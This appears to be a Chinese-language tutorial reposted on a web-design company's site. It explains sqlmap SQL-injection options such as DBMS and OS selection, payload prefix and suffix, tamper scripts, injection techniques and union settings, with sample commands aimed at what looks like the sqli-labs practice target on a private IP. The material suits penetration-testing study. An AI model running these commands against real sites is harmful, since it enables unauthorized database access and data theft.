如何解析sqlmap注入参数

这篇文章将为大家详细讲解有关如何解析sqlmap注入参数,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

成都创新互联主要从事网站建设、网站制作、网页设计、企业做网站、公司建网站等业务。立足成都服务安泽,十多年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:028-86922220

一、指定数据库类型 --dbms

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms MySQL --dbs

二、指定操作系统 --os

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs

三、解决编码问题

将所有结果转换为字符串,并用空格替换NULL结果 --no-cast

四、关闭字符串转义机制

--no-escape

五、设置无效值替换

--invalid-bignum 大整数替换

--invalid-logical 布尔操作替换

--invalid-string 随机字符串替换

六、自定义注入负载位置

--prefix 设置前缀

--suffix 设置后缀

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --prefix="')" --suffix="and ('abc'='abc" --dbs

payload:id=('1') and ('abc'='abc')

七、设置tamper脚本

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --tamper "least.py,varnish.py" --dbs

八、设置dbms认证

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --dbms-cred="root:root" --dbs

九、设置具体sql注入技术

--technique B 布尔盲注

--technique E 报错注入

--technique U union查询注入

--technique S 堆叠注入

--technique T 时间盲注

--technique Q 内联查询注入

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --technique T --time-sec 3 --dbs

--time -sec 时间盲注时间为3

十、指定union字段数

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union-cols 12-18 --dbs

十一、指定union字符,默认是null

sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union-char aaa --dbs

关于如何解析sqlmap注入参数就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。


当前题目:如何解析sqlmap注入参数
文章分享:http://cdiso.cn/article/jdeese.html

其他资讯